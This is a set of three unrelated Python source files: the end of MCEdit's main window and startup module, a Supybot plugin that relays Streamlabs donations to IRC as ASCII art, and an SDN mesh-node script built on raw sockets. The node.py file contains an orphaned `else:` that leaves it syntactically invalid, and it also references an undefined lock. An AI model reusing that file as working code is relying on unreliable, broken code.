self.showOptions),
("",
"Homepage",
lambda: platform_open("http://www.mcedit-unified.net"),
"http://www.mcedit-unified.net"),
("",
"About MCEdit",
lambda: platform_open("http://www.mcedit-unified.net/about.html"),
"http://www.mcedit-unified.net/about.html"),
("",
"License",
showLicense,
#os.path.join(directories.getDataDir(), "LICENSE.txt")),
directories.getDataFile('LICENSE.txt')),
("",
"Refresh Player Names",
refresh),
("",
"Update Version Definitions",
update_mcver)
])
c = albow.HotkeyColumn(hotkeys)
return c
def makeSideColumn2(self):
def showCacheDir():
try:
os.mkdir(directories.getCacheDir())
except OSError:
pass
platform_open(directories.getCacheDir())
def showScreenshotsDir():
try:
os.mkdir(os.path.join(directories.getCacheDir(), "screenshots"))
except OSError:
pass
platform_open(os.path.join(directories.getCacheDir(), "screenshots"))
hotkeys = ([("",
"Config Files",
showCacheDir,
directories.getCacheDir()),
("",
"Screenshots",
showScreenshotsDir,
os.path.join(directories.getCacheDir(), "screenshots"))
])
c = albow.HotkeyColumn(hotkeys)
return c
def resized(self, dw, dh):
"""
Handle window resizing events.
"""
if DEBUG_WM:
print "############################ RESIZED ############################"
(w, h) = self.size
config_w, config_h = config.settings.windowWidth.get(), config.settings.windowHeight.get()
win = self.displayContext.win
if DEBUG_WM and win:
print "dw", dw, "dh", dh
print "self.size (w, h) 1", self.size, "win.get_size", win.get_size()
print "size 1", config_w, config_h
elif DEBUG_WM and not win:
print "win is None, unable to print debug messages"
if win:
x, y = win.get_position()
if DEBUG_WM:
print "position", x, y
print "config pos", (config.settings.windowX.get(), config.settings.windowY.get())
if w == 0 and h == 0:
# The window has been minimized, no need to draw anything.
self.editor.renderer.render = False
return
# Mac window handling works better now, but `win`
# doesn't exist. So to get this alert to show up
# I'm checking if the platform is darwin. This only
# works because the code block never actually references
# `win`, otherwise it WOULD CRASH!!!
# You cannot change further if statements like this
# because they reference `win`
if win or sys.platform == "darwin":
# Handling too small resolutions.
# Dialog texts.
# "MCEdit does not support window resolutions below 1000x700.\nYou may not be able to access all functions at this resolution."
# New buttons:
# "Don't warn me again": disable the window popup across sessions.
# Tooltip: "Disable this message. Definitively. Even the next time you start MCEdit."
# "OK": dismiss the window and let go, don't pop up again for the session
# Tooltip: "Continue and not see this message until you restart MCEdit"
# "Cancel": resizes the window to the minimum size
# Tooltip: "Resize the window to the minimum recommended resolution."
# If the config showWindowSizeWarning is true and self.resizeAlert is true, show the popup
if (w < 1000 or h < 680) and config.settings.showWindowSizeWarning.get():
_w = w
_h = h
if self.resizeAlert:
answer = "_OK"
# Force the size only for the dimension that needs it.
if w < 1000 and h < 680:
_w = 1000
_h = 680
elif w < 1000:
_w = 1000
elif h < 680:
_h = 680
if not albow.dialogs.ask_tied_to:
answer = albow.ask(
"MCEdit does not support window resolutions below 1000x700.\nYou may not be able to access all functions at this resolution.",
["Don't remind me again.", "OK", "Cancel"], default=1, cancel=1,
responses_tooltips={
"Don't remind me again.": "Disable this message. Definitively. Even the next time you start MCEdit.",
"OK": "Continue and not see this message until you restart MCEdit",
"Cancel": "Resize the window to the minimum recommended resolution."},
tie_widget_to=True)
else:
if not albow.dialogs.ask_tied_to._visible:
albow.dialogs.ask_tied_to._visible = True
answer = albow.dialogs.ask_tied_to.present()
if answer == "Don't remind me again.":
config.settings.showWindowSizeWarning.set(False)
self.resizeAlert = False
elif answer == "OK":
w, h = self.size
self.resizeAlert = False
elif answer == "Cancel":
w, h = _w, _h
else:
if albow.dialogs.ask_tied_to:
albow.dialogs.ask_tied_to.dismiss("_OK")
del albow.dialogs.ask_tied_to
albow.dialogs.ask_tied_to = None
elif w >= 1000 or h >= 680:
if albow.dialogs.ask_tied_tos:
for ask_tied_to in albow.dialogs.ask_tied_tos:
ask_tied_to._visible = False
ask_tied_to.dismiss("_OK")
ask_tied_to.set_parent(None)
del ask_tied_to
if not win:
if w < 1000:
config.settings.windowWidth.set(1000)
w = 1000
x = config.settings.windowX.get()
if h < 680:
config.settings.windowHeight.set(680)
h = 680
y = config.settings.windowY.get()
if not self.editor.renderer.render:
self.editor.renderer.render = True
save_geom = True
if win:
maximized = win.get_state() == mcplatform.MAXIMIZED
sz = map(max, win.get_size(), (w, h))
if DEBUG_WM:
print "sz", sz
print "maximized", maximized, "self.maximized", self.maximized
if maximized:
if DEBUG_WM:
print "maximize, saving maximized size"
config.settings.windowMaximizedWidth.set(sz[0])
config.settings.windowMaximizedHeight.set(sz[1])
config.save()
self.saved_pos = config.settings.windowX.get(), config.settings.windowY.get()
save_geom = False
self.resizing = 0
win.set_mode(sz, self.displayContext.displayMode())
else:
if DEBUG_WM:
print "size 2", config.settings.windowWidth.get(), config.settings.windowHeight.get()
print "config_w", config_w, "config_h", config_h
print "pos", config.settings.windowX.get(), config.settings.windowY.get()
if self.maximized != maximized:
if DEBUG_WM:
print "restoring window pos and size"
print "(config.settings.windowX.get(), config.settings.windowY.get())", (
config.settings.windowX.get(), config.settings.windowY.get())
(w, h) = (config_w, config_h)
win.set_state(1, (w, h), self.saved_pos)
else:
if DEBUG_WM:
print "window resized"
print "setting size to", (w, h), "and pos to", (x, y)
win.set_mode((w, h), self.displayContext.displayMode())
win.set_position((x, y))
config.settings.windowMaximizedWidth.set(0)
config.settings.windowMaximizedHeight.set(0)
config.save()
self.maximized = maximized
if DEBUG_WM:
print "self.size (w, h) 2", self.size, (w, h)
surf = pygame.display.get_surface()
print "display surf rect", surf.get_rect()
if win:
if hasattr(win.base_handler, 'get_geometry'):
print "win.base_handler geometry", win.base_handler.get_geometry()
print "win.base_handler.parent geometry", win.base_handler.query_tree().parent.get_geometry()
print "win.base_handler.parent.parent geometry", win.base_handler.query_tree().parent.query_tree().parent.get_geometry()
if save_geom:
config.settings.windowWidth.set(w)
config.settings.windowHeight.set(h)
config.save()
# The alert window is disabled if win is not None
if not win and (dw > 20 or dh > 20):
if not hasattr(self, 'resizeAlert'):
self.resizeAlert = self.shouldResizeAlert
if self.resizeAlert:
albow.alert(
"Window size increased. You may have problems using the cursor until MCEdit is restarted.")
self.resizeAlert = False
if win:
win.sync()
GLViewport.resized(self, dw, dh)
shouldResizeAlert = config.settings.shouldResizeAlert.property()
def loadFile(self, filename, addToRecent=True):
if os.path.exists(filename):
if filename.endswith(".mcworld"):
filename = mcworld_support.open_world(filename)
addToRecent = False
try:
self.editor.loadFile(filename, addToRecent=addToRecent)
except NotImplementedError as e:
albow.alert(e.message)
return None
except Exception as e:
logging.error(u'Failed to load file {0}: {1!r}'.format(
filename, e))
return None
self.remove(self.fileOpener)
self.fileOpener = None
if self.editor.level:
self.editor.size = self.size
self.add(self.editor)
self.focus_switch = self.editor
def createNewWorld(self):
level = self.editor.createNewLevel()
if level:
self.remove(self.fileOpener)
self.editor.size = self.size
self.add(self.editor)
self.focus_switch = self.editor
albow.alert(
"World created. To expand this infinite world, explore the world in Minecraft or use the Chunk Control tool to add or delete chunks.")
def removeEditor(self):
self.remove(self.editor)
self.fileOpener = albow.FileOpener(self)
self.add(self.fileOpener)
self.focus_switch = self.fileOpener
def confirm_quit(self):
#-# saving language template
if hasattr(albow.translate, "saveTemplate"):
albow.translate.saveTemplate()
#-#
self.saveWindowPosition()
config.save()
if self.editor.unsavedEdits:
result = albow.ask(_("There are {0} unsaved changes.").format(self.editor.unsavedEdits),
responses=["Save and Quit", "Quit", "Cancel"])
if result == "Save and Quit":
self.saveAndQuit()
elif result == "Quit":
self.justQuit()
elif result == "Cancel":
return False
else:
raise SystemExit
def saveAndQuit(self):
self.editor.saveFile()
raise SystemExit
@staticmethod
def justQuit():
raise SystemExit
@classmethod
def fetch_version(cls):
with cls.version_lock:
cls.version_info = release.fetch_new_version_info()
def check_for_version(self):
new_version = release.check_for_new_version(self.version_info)
if new_version is not False:
answer = albow.ask(
_('Version {} is available').format(new_version["tag_name"]),
[
'Download',
'View',
'Ignore'
],
default=1,
cancel=2
)
if answer == "View":
platform_open(new_version["html_url"])
elif answer == "Download":
platform_open(new_version["asset"]["browser_download_url"])
albow.alert(_(
' {} should now be downloading via your browser. You will still need to extract the downloaded file to use the updated version.').format(
new_version["asset"]["name"]))
@classmethod
def main(cls):
PlayerCache().load()
displayContext = GLDisplayContext(splash.splash, caption=(
('MCEdit ~ ' + release.get_version() % _("for")).encode('utf-8'), 'MCEdit'))
os.environ['SDL_VIDEO_CENTERED'] = '0'
rootwidget = RootWidget(displayContext.display)
mcedit = MCEdit(displayContext)
rootwidget.displayContext = displayContext
rootwidget.confirm_quit = mcedit.confirm_quit
rootwidget.mcedit = mcedit
rootwidget.add(mcedit)
rootwidget.focus_switch = mcedit
if mcedit.droppedLevel:
mcedit.loadFile(mcedit.droppedLevel)
cls.version_lock = threading.Lock()
cls.version_info = None
cls.version_checked = False
fetch_version_thread = threading.Thread(target=cls.fetch_version)
fetch_version_thread.start()
if config.settings.closeMinecraftWarning.get():
answer = albow.ask(
"Warning: Only open a world in one program at a time. If you open a world at the same time in MCEdit and in Minecraft, you will lose your work and possibly damage your save file.\n\n If you are using Minecraft 1.3 or earlier, you need to close Minecraft completely before you use MCEdit.",
["Don't remind me again.", "OK"], default=1, cancel=1)
if answer == "Don't remind me again.":
config.settings.closeMinecraftWarning.set(False)
if not config.settings.reportCrashesAsked.get():
answer = albow.ask(
'Would you like to send anonymous error reports to the MCEdit-Unified Team to help with improving future releases?\n\nError reports are stripped of any identifying user information before being sent.\n\nPyClark, the library used, is open source under the GNU LGPL v3 license and is maintained by Podshot. The source code can be located here: https://github.com/Podshot/pyClark.\n\nThere has been no modification to the library in any form.',
['Allow', 'Deny'], default=1, cancel=1
)
if answer == 'Allow':
albow.alert("Error reporting will be enabled next time MCEdit-Unified is launched")
config.settings.reportCrashes.set(answer == 'Allow')
config.settings.reportCrashesAsked.set(True)
config.save()
if "update" in config.version.version.get():
answer = albow.ask(
"There are new default controls. Do you want to replace your current controls with the new ones?",
["Yes", "No"])
if answer == "Yes":
for configKey, k in keys.KeyConfigPanel.presets["WASD"]:
config.keys[config.convert(configKey)].set(k)
config.version.version.set("1.6.0.0")
config.save()
if "-causeError" in sys.argv:
raise ValueError("Error requested via -causeError")
while True:
try:
rootwidget.run()
except (SystemExit, KeyboardInterrupt):
print "Shutting down..."
exc_txt = traceback.format_exc()
if mcedit.editor.level:
if config.settings.savePositionOnClose.get():
mcedit.editor.waypointManager.saveLastPosition(mcedit.editor.mainViewport,
mcedit.editor.level.dimNo)
mcedit.editor.waypointManager.save()
# The following Windows specific code won't be executed if we're using '--debug-wm' switch.
if not USE_WM and sys.platform == "win32" and config.settings.setWindowPlacement.get():
(flags, showCmd, ptMin, ptMax, rect) = mcplatform.win32gui.GetWindowPlacement(
display.get_wm_info()['window'])
X, Y, r, b = rect
if (showCmd == mcplatform.win32con.SW_MINIMIZE or
showCmd == mcplatform.win32con.SW_SHOWMINIMIZED):
showCmd = mcplatform.win32con.SW_SHOWNORMAL
config.settings.windowX.set(X)
config.settings.windowY.set(Y)
config.settings.windowShowCmd.set(showCmd)
# Restore the previous language if we ran with '-tt' (update translation template).
if albow.translate.buildTemplate:
logging.warning('Restoring %s.' % orglang)
config.settings.langCode.set(orglang)
#
config.save()
mcedit.editor.renderer.discardAllChunks()
mcedit.editor.deleteAllCopiedSchematics()
if mcedit.editor.level:
mcedit.editor.level.close()
mcedit.editor.root.RemoveEditFiles()
if 'SystemExit' in traceback.format_exc() or 'KeyboardInterrupt' in traceback.format_exc():
raise
else:
if 'SystemExit' in exc_txt:
raise SystemExit
if 'KeyboardInterrupt' in exc_txt:
raise KeyboardInterrupt
except MemoryError:
traceback.print_exc()
mcedit.editor.handleMemoryError()
def saveWindowPosition(self):
"""Save the window position in the configuration handler."""
if DEBUG_WM:
print "############################ EXITING ############################"
win = self.displayContext.win
# The following Windows specific code will not be executed if we're using '--debug-wm' switch.
if not USE_WM and sys.platform == "win32" and config.settings.setWindowPlacement.get():
(flags, showCmd, ptMin, ptMax, rect) = mcplatform.win32gui.GetWindowPlacement(
display.get_wm_info()['window'])
X, Y, r, b = rect
if (showCmd == mcplatform.win32con.SW_MINIMIZE or
showCmd == mcplatform.win32con.SW_SHOWMINIMIZED):
showCmd = mcplatform.win32con.SW_SHOWNORMAL
config.settings.windowX.set(X)
config.settings.windowY.set(Y)
config.settings.windowShowCmd.set(showCmd)
elif win:
config.settings.windowMaximized.set(self.maximized)
if not self.maximized:
x, y = win.get_position()
else:
x, y = self.saved_pos
if DEBUG_WM:
print "x", x, "y", y
config.settings.windowX.set(x)
config.settings.windowY.set(y)
def restart(self):
self.saveWindowPosition()
config.save()
self.editor.renderer.discardAllChunks()
self.editor.deleteAllCopiedSchematics()
if self.editor.level:
self.editor.level.close()
self.editor.root.RemoveEditFiles()
python = sys.executable
if sys.argv[0].endswith('.exe') or hasattr(sys, 'frozen'):
os.execl(python, python, *sys.argv[1:])
else:
os.execl(python, python, *sys.argv)
def main(argv):
"""
Setup display, bundled schematics. Handle unclean
shutdowns.
"""
try:
display.init()
except pygame.error:
os.environ['SDL_VIDEODRIVER'] = 'directx'
try:
display.init()
except pygame.error:
os.environ['SDL_VIDEODRIVER'] = 'windib'
display.init()
pygame.font.init()
try:
if not os.path.exists(directories.schematicsDir):
shutil.copytree(
#os.path.join(directories.getDataDir(), u'stock-schematics'),
directories.getDataFile('stock-schematics'),
directories.schematicsDir
)
except Exception as e:
logging.warning('Error copying bundled schematics: {0!r}'.format(e))
try:
os.mkdir(directories.schematicsDir)
except Exception as e:
logging.warning('Error creating schematics folder: {0!r}'.format(e))
try:
ServerJarStorage()
except Exception as e:
logging.warning('Error creating server jar storage folder: {0!r}'.format(e))
try:
MCEdit.main()
except Exception as e:
print "mcedit.main MCEdit exited with errors."
logging.error("MCEdit version %s", release.get_version())
display.quit()
if hasattr(sys, 'frozen') and sys.platform == 'win32':
logging.exception("%s", e)
print "Press RETURN or close this window to dismiss."
raw_input()
raise
return 0
def getSelectedMinecraftVersion():
profile = directories.getMinecraftProfileJSON()[directories.getSelectedProfile()]
if 'lastVersionId' in profile:
return profile['lastVersionId']
else:
return '1.8'
def getLatestMinecraftVersion(snapshots=False):
import urllib2
import json
versioninfo = json.loads(
urllib2.urlopen("http://s3.amazonaws.com/Minecraft.Download/versions/versions.json ").read())
if snapshots:
return versioninfo['latest']['snapshot']
else:
return versioninfo['latest']['release']
def weird_fix():
try:
from OpenGL.platform import win32
except Exception:
pass
class FakeStdOutErr:
"""Fake file object to redirect very last Python output.
Used to track 'errors' not handled in MCEdit.
Mimics 'write' and 'close' file objects methods.
Used on Linux only."""
mode = 'a'
def __init__(self, *args, **kwargs):
"""*args and **kwargs are ignored.
Deletes the 'logger' object and reopen 'logfile' in append mode."""
global logger
global logfile
del logger
self.fd = open(logfile, 'a')
def write(self, msg):
self.fd.write(msg)
def close(self, *args, **kwargs):
self.fd.flush()
self.fd.close()
if __name__ == "__main__":
try:
main(sys.argv)
except (SystemExit, KeyboardInterrupt):
# It happens that on Linux, Python tries to kill already dead processes and display errors in the console.
# Redirecting them to the log file preserve them and other errors which may occur.
if sys.platform == "linux2":
logger.debug("MCEdit is exiting normally.")
logger.debug("Lines below this one are pure Python output.")
sys.stdout = sys.stderr = FakeStdOutErr()
mcworld_support.close_all_temp_dirs()
pass
except:
mcworld_support.close_all_temp_dirs()
traceback.print_exc()
print ""
print "=================================="
print "\t\t\t MCEdit has crashed"
print "=================================="
raw_input("Press the Enter key to close this window")
pass
|
plugin.py
|
###
# Copyright (c) 2020, Triple A
# All rights reserved.
#
#
###
from supybot import utils, plugins, ircutils, callbacks
from supybot.commands import *
try:
from supybot.i18n import PluginInternationalization
_ = PluginInternationalization('StreamlabsIRC')
except ImportError:
# Placeholder that allows to run the plugin on a bot
# without the i18n module
_ = lambda x: x
from supybot import ircmsgs
import websocket
import json
import pprint
import time
import threading
import os
from chardet import detect
class StreamlabsIRC(callbacks.Plugin):
"""Uses Streamlabs API to play ASCII in IRC channels requested by donations."""
threaded = True
# https://stackoverflow.com/a/53851783
# get file encoding type
def get_encoding_type(self, file_name):
with open(file_name, 'rb') as f:
rawdata = f.read()
return detect(rawdata)['encoding']
def scroll(self, ascii_name, donor_name, donation_amount):
print('scroll')
ascii_filename = ascii_name + '.txt'
if ascii_filename in os.listdir(self.ascii_directory):
print(ascii_name + ': ascii_found')
self.irc.queueMsg(ircmsgs.privmsg(self.channel_name, '{} has requested the "{}" ascii by donating {}'.format(donor_name, ascii_name, donation_amount)))
ascii_filename_txt = os.path.join(self.ascii_directory, ascii_filename)
print(ascii_filename_txt)
from_codec = self.get_encoding_type(ascii_filename_txt)
print(from_codec)
with open(ascii_filename_txt, 'r', encoding=from_codec) as f:
# with open(os.path.join(self.ascii_directory, ascii_filename), 'r') as f:
# ascii_lines = f.read().encode('utf-8').split('\n')
# ascii_text = f.read().encode('utf-8')
ascii_text = f.read()
ascii_lines = ascii_text.replace('\r\n', '\n').split('\n')
for line in ascii_lines:
self.irc.queueMsg(ircmsgs.privmsg(self.channel_name, line))
else:
self.irc.queueMsg(ircmsgs.privmsg(self.channel_name, '"{}" ascii not found :<'.format(ascii_name)))
def stream_sock(self):
def on_message(ws, message):
if 'event' not in message:
return
first_square_bracket_index = message.find('[')
if first_square_bracket_index == -1:
return
message_list_string = message[first_square_bracket_index:]
message_list = json.loads(message[first_square_bracket_index:])
if message_list[1]['type'] != 'donation':
return
pprint.pprint(message_list)
donor_name = message_list[1]['message'][0]['from']
donation_amount = message_list[1]['message'][0]['formatted_amount']
donation_message = message_list[1]['message'][0]['message']
if donation_message.startswith('!ascii '):
self.scroll(donation_message.split('!ascii ')[1], donor_name, donation_amount)
# self.scroll('vap0r-trex', donor_name, donation_amount)
else:
self.irc.queueMsg(ircmsgs.privmsg(self.channel_name, '{} donated {} with the message "{}"'.format(donor_name, donation_amount, donation_message)))
def on_error(ws, error):
print(error)
def on_close(ws):
print("### closed ###")
def on_open(ws):
print("### open ###")
def run(*args):
count = 0
while True:
print('ping {}'.format(count))
count += 1
ws.send("2")
time.sleep(15)
self.ws_ping = threading.Thread(target= lambda: run())
self.ws_ping.daemon = False
self.ws_ping.start()
print('stream_sock')
# websocket.enableTrace(True)
self.ws = websocket.WebSocketApp("wss://sockets.streamlabs.com/socket.io/?token={}&EIO=3&transport=websocket".format(self.streamlabs_socket_token), on_message = on_message, on_error = on_error, on_close = on_close)
self.ws.on_open = on_open
self.wst = threading.Thread(target=lambda: self.ws.run_forever())
self.wst.daemon = False
self.wst.start()
def __init__(self, irc):
print('__init__')
self.ascii_directory = ""
self.channel_name = ""
self.streamlabs_socket_token = ""
print(self.ascii_directory, self.channel_name, self.streamlabs_socket_token)
self.irc = irc
self.__parent = super(StreamlabsIRC, self)
self.__parent.__init__(irc)
self.stream_sock()
Class = StreamlabsIRC
# vim:set shiftwidth=4 softtabstop=4 expandtab textwidth=79:
|
node.py
|
#!/usr/bin/python3
import socket
import sys
import binascii
import time
import threading
import logging
import _thread
SDN_CONTROLLER_ADDRESS = '10.0.254.1'
SDN_CONTROLLER_PORT = 14323
TICK_TIME = 1
class RootNode(threading.Thread):
def __init__(self, evntObj, cachLck, cache):
threading.Thread.__init__(self)
self.rootCon = socket.socket(family=socket.AF_INET, type=socket.SOCK_STREAM, proto=0) # Root node's connection towards controller
self.rootCon.connect((SDN_CONTROLLER_ADDRESS, SDN_CONTROLLER_PORT))
self.rootCon.setblocking(0)
self.evntObj = evntObj
self.rootLck = threading.Lock()
self.cachLck = cachLck
self.cache = cache
def run(self):
with self.rootCon :
while True :
self.evntObj.wait(10)
_rcvData = None
try:
with self.rootLck:
_rcvData = str(self.rootCon.recv(1024))
logging.warning("[rootSend][ROOT] : _rcvData {}".format(_rcvData))
if _rcvData :
with self.cachLck :
self.cache['ctr']['sdn']['nm'] = True
self.cache['ctr']['sdn']['msh'] = _rcvData
# [NOTE] Not useful to process the SDN control packet in root thread. It should be processed
# by node thread
# if 'net_map_stop' in _rcvData :
# with self.cachLck :
# self.cache['ctr']['dwn_sdn_msg']['ctMng_on_off'] = 2 # 0 - default 1 - on 2 - off
except BlockingIOError:
pass
def rootSend(self, payload):
with self.rootLck:
_totalBytes = self.rootCon.send(bytes(payload, 'utf8'))
logging.info("[rootSend][ROOT] : Total sent {} bytes".format(_totalBytes))
return _totalBytes
class NodeUtilities:
def macAddressGetter(self, nodeNum) :
with open('/sys/class/net/wpan{}/address'.format(nodeNum), 'r') as f :
strng = f.readline()
strng = b''.join(binascii.unhexlify(x) for x in strng[:-1].split(':')) # This should be ':' since MAC address is delimited by ':' only
return strng
def internalCounter(self):
while True:
if not self.counter :
self.counter = 254
else :
self.counter -= 1
self.evntObj.wait(10)
logging.debug("node.nodeUtilities: [_internalCounter] self.counter {}".format(self.counter))
return
class PriCtrlPlaneUnit(NodeUtilities, RootNode, threading.Thread): # order in arg list is improtant it affects the inheritence order
# It works for only one pkt format 41c8 broadcast with long source address
#_ctlPlnThrd = PriCtrlPlaneUnit(evntObj=_event_obj, sockLck=_sockLck, macRwsk=l2_sock, cachLck=_cachLck, cache=_cache, rootNode=_rootNodeThrd)
def __init__(self, evntObj, sockLck, macRwsk, cachLck, cache, macAdrs=None, pktBffr=b'\x41\xc8\x00\xff\xff\xff\xff', rcvdPkt=None, nodeType='ccn', rootNode=None) :
# Call the Thread class's init function
threading.Thread.__init__(self)
self.evntObj = evntObj # Node's common clock
self.sockLck = sockLck # Socket Lock allowing atomicity
self.cachLck = cachLck # Node cache lock allowing atomicity
self.macRwsk = macRwsk # Node's MAC RAW socket
self.cache = cache # Node's cache
with self.cachLck :
_getVal = self.cache['nod']
if not macAdrs :
self.macAdrs = self.macAddressGetter(_getVal) # Node's MAC address
else :
self.macAdrs = macAdrs
self.pktBffr = pktBffr # Node's packet buffer
self.rcvdPkt = rcvdPkt # Received packet buffer
if nodeType == 'ccn' :
self.topic = None # Node's self topic
self.rootNod = rootNode
# Preconfigured values
self.counter = 254 # System Clock
threading.Thread(target=self.internalCounter, args=()).start()
self.nodeRnk = 254 # Node's rank in the network
self.topic = self.macAdrs[-1:]
logging.debug('[priCtrlPlaneUnit][TPC][SELF] : {}'.format(bytes(self.topic)))
# Reference variable for length of cache 'pav'
with self.cachLck:
self.lenCachePav = str(self.cache['pav']).__len__()
logging.debug('[priCtrlPlaneUnit][MAC][ADRS] : {}'.format(self.macAdrs))
return
def __dictToSerial(self, dic):
if not isinstance(dic, dict) :
return dic
strng = ''
for key in dic.keys():
try:
if int(dic[key]['r']) < self.nodeRnk :
continue
except (TypeError, KeyError):
pass
try:
if int(key) < 10 :
strng += '0' + key
else :
strng += key
except ValueError :
strng += key
strng += str(self.__dictToSerial(dic[key]))
return strng
def _recvProcess(self):
self.rcvdPkt = None
# Recieve packets
try:
with self.sockLck:
self.rcvdPkt = self.macRwsk.recvfrom(123)
logging.info('[_recvProcess][RCVD][PKT] : {}'.format(self.rcvdPkt))
except BlockingIOError:
pass
return
def _pktProcessngProcess(self):
_valHolder = [ False, ]
""" Recevied message validity flags
[0] -> Valid conn req flag
[1] -> Hold SDN msg
"""
_tmpHld = str(self.rcvdPkt[0]).split('>')
logging.debug('[_pktProcessngProcess][PKT] : {}'.format(_tmpHld))
for index in range(1, _tmpHld.__len__() - 1, 2): # Processing each attribute at a time for now
_attribute = _tmpHld[index] # only one pair of attribute value is transmitted
_value = _tmpHld[index+1]
logging.debug('[_pktProcessngProcess][PKT] : {} {}'.format(_attribute, _value)) # Debug takes only str as argument
# Connection request in packet
if 'con' in _attribute :
if int(_value[1:]) > self.nodeRnk :
logging.info('[_pktProcessngProcess][CON] : {}'.format(_tmpHld[0][-2:]))
_valHolder[0] = True
continue
# New SDN message
if 'sdn' in _attribute :
_valHolder.append(True)
continue
if _valHolder[0] and 'nod' in _attribute :
with self.cachLck :
_getVal = self.cache['nod']
if not _getVal :
self.rootNod.rootSend(payload='con_req:' + _value)
else :
self._broadcastConnectionRequest(payload=_value)
continue
# [NOTE] We may want process SDN message in _cacheConfigUpdation. Rantional : It makes sense there since we are al
# ready updating cache which holds all the node's configuration
if _valHolder[1] and 'rnk' in _attribute : # if we don't have _valHolder 'rnk' in _attribute contd will execute
if _value < self.nodeRnk :
with self.lock:
self.cache['ctr']['sdn']['nm'] = True
self.cache['ctr']['sdn']['msg'] = _tmpHld
pass
# Rank in packet
if 'rnk' in _attribute :
with self.cachLck:
# Rank setter
if int(_value) < self.nodeRnk :
self.nodeRnk = 2 * int(_value)
logging.info('[_pktProcessngProcess][SETG][RNK] : my rank is {}'.format(self.nodeRnk))
self.cache['pav'][str(self.rcvdPkt[1][-1][0])] = dict(r=_value)
self.cache['ctr']['rnk']['brd'] = 3 # We're going to introduce ttl-like concept
# Receive down nodes' ranks
elif int(_value) >= self.nodeRnk :
logging.info('[_pktProcessngProcess][RECV][RNK] : node {} rank {}'.format(self.rcvdPkt[1][-1][0], _value))
self.cache['pav'][str(self.rcvdPkt[1][-1][0])] = dict(r=_value)
logging.info('[_pktProcessngProcess][CACHE][PAV] : {}'.format(self.cache['pav']))
continue
# Network map in packet
if 'pav' in _attribute :
logging.info('[_pktProcessngProcess][RECV][PAV] : node {} lowerRank {}'.format(self.rcvdPkt[1][-1][0], _value))
with self.cachLck:
try:
if int(self.cache['pav'][str(self.rcvdPkt[1][-1][0])]['r']) <= self.nodeRnk :
continue
except (KeyError, TypeError):
pass
try:
self.cache['pav'][str(self.rcvdPkt[1][-1][0])]['d'] = _value + 'D'
except KeyError:
self.cache['pav'][str(self.rcvdPkt[1][-1][0])] = dict(d=(_value+'D'))
logging.debug('[_pktProcessngProcess][CACHE][PAV] : {}'.format(self.cache['pav']))
continue
return
def _broadcastProcess(self, sendBuffer):
with self.sockLck:
_totalBytes = self.macRwsk.send(sendBuffer + bytes(str(self.nodeRnk) + '>', 'utf8'))
logging.info('[_broadcastProcess][SENT][PKT] : Total sent {} bytes'.format(_totalBytes))
with self.cachLck:
self.cache['ctr']['rnk']['brd'] -= 1
return
def _broadcastNetMap(self):
_cachPav = None
with self.cachLck:
_cachPav = self.cache['pav']
logging.debug('[_broadcastNetMap] _cachPav.__len__() {} refLenCachePav {} counter {}'.format(_cachPav.__len__(), self.lenCachePav, self.counter))
try:
with self.sockLck:
_totalBytes = self.macRwsk.send(self.pktBffr + self.macAdrs + b'>pav>' + bytes(self.__dictToSerial(_cachPav), 'utf8') + b'>')
logging.info('[_broadcastNetMap][SENT][PKT] : Total sent {} bytes'.format(_totalBytes))
# Sending the network map towards controller
with self.cachLck :
_getVal = self.cache['nod']
if not _getVal :
self.rootNod.rootSend('net_map:' + self.__dictToSerial(_cachPav))
except OSError:
logging.debug(self.__dictToSerial(_cachPav))
return
def _broadcastConnectionRequest(self, payload=''):
# Connection request is only inter domain communications
# If communication reuest approved the specified nodes only cache the specific data
with self.cachLck :
_getVal = self.cache['nod']
payload += '<' + str(_getVal)
with self.sockLck:
_totalBytes = self.macRwsk.send(self.pktBffr + self.macAdrs + b'>con>r' + bytes(str(self.nodeRnk), 'utf8') + b'>nod>' + bytes(payload, 'utf8') + b'>')
logging.warning('[_broadcastConnectionRequest] payload {}'.format(payload))
logging.info('[_broadcastConnectionRequest][SENT][PKT] : Total sent {} bytes'.format(_totalBytes))
return
def _cachConfigUpdation(self):
# with self.cachLck:
# if self.cache['ctr']['dwn_sdn_msg']['ctMng_on_off'] :
# if self.cache['ctr']['dwn_sdn_msg']['ctMng_on_off'] == 2:
# self.cache['ctr']['rnk']['m_brd'] = False
# self.cache['ctr']['con']['brd'] = True
# elif self.cache['ctr']['dwn_sdn_msg']['ctMng_on_off'] == 1 :
# self.cache['ctr']['rnk']['m_brd'] = False
# self.cache['ctr']['con']['brd'] = True
# Propagating down the new sdn msg
self._broadcastProcess(self.pktBffr + self.macAdrs + bytes('>d_sdn_m>1>rnk>{}'.format(self.nodeRnk), 'utf8'))
else :
pass
return
# Change logWmsg to control logging in this function
def run(self, logWmsg=True):
_sendBuffer = self.pktBffr + self.macAdrs + bytes('>rnk>', 'utf8')
# Root node
with self.cachLck :
_getVal = self.cache['nod']
if not _getVal and self.nodeRnk == 254 :
self.nodeRnk = 1
_sendBuffer += bytes(str(self.nodeRnk) + '>', 'utf8')
with self.cachLck:
self.cache['ctr']['rnk']['brd'] = 3
# Node Process Begins
while True :
# Main continuous process
# Receive function
_getVal = None
with self.cachLck:
logging.debug("[run] self.cache {}".format(self.cache))
_getVal = self.cache['ctr']['rcv']
if _getVal :
self._recvProcess()
logWmsg and logging.warning('[run] Receiving...')
# Received packet processing
if self.rcvdPkt :
self._pktProcessngProcess()
# Broadcast rank
_getVal = None
with self.cachLck:
_getVal = self.cache['ctr']['rnk']['brd'] and self.cache['ctr']['rnk']['m_brd']
if _getVal :
self._broadcastProcess(_sendBuffer)
logWmsg and logging.warning('[run] Broadcasting Rank...')
# Wait for next tick
self.evntObj.wait(10)
# Process new configuration
# [COMPLETED] should set a flag if I need to process this time can either from root thread or pkt processing function
_getVal = None
with self.cachLck:
_getVal = self.cache['ctr']['sdn']['nm']
if _getVal :
self._cachConfigUpdation()
# Connection request Broadcast
_getVal = None
with self.cachLck:
_getVal = self.cache['ctr']['con']['brd']
if _getVal and self.nodeRnk != 254 :
self._broadcastConnectionRequest()
logWmsg and logging.warning('[run] Broadcasting Connection Request...')
# Broadcast network map
_getVal = []
with self.cachLck:
_getVal.append(self.cache['ctr']['rnk']['m_brd'])
if _getVal[0] :
_getVal.append(str(self.cache['pav']).__len__())
if _getVal[0] and _getVal[1] != self.lenCachePav and not self.counter % 3 :
self.lenCachePav = _getVal[1]
with self.cachLck:
logging.debug('[run] Broadcasting Map: self.cache[\'pav\'] {}'.format(self.cache['pav']))
self._broadcastNetMap()
logWmsg and logging.warning('[run] Broadcasting Network Map...')
return
